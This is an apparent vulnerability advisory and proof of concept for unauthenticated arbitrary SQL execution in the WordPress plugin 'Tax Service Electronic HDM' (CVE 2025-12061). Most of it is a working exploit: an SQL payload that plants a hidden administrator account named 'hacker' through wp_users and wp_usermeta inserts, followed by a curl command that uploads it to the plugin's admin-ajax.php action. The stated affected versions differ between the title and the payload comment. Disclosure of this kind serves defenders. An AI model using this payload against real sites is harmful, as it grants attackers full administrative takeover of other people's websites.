Tax Service Electronic HDM < 1.2.1 – Unauthenticated Arbitrary SQL Execution | CVE 2025-12061

Description

The plugin does not authorization and CSRF checks in an AJAX action, allowing unauthenticated users to import and execute arbitrary SQL statements

Proof of Concept

1. Payload (evil.sql):

-- PoC: Privilege Escalation via Unauthenticated SQL Execution in
-- TAX SERVICE Electronic HDM <= 1.1.2
-- This payload creates a new Administrator user 'hacker' with password 'pass123'

Step 1: Create the user
INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_status)
VALUES ('hacker', MD5('pass123'), 'Nxploited', 'attacker@example.com', 0);

Step 2: Grant Administrator role (single-site)
INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
VALUES (
    (SELECT ID FROM wp_users WHERE user_login = 'hacker'),
    'wp_capabilities',
    'a:1:{s:13:"administrator";b:1;}'
);

Step 3: Set user level to 10
INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
VALUES (
    (SELECT ID FROM wp_users WHERE user_login = 'hacker'),
    'wp_user_level',
    '10'
);

2. Exploit Command:

curl -v -X POST \
  -F "file=@evil.sql;type=application/sql" \
  "http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=importTaxService"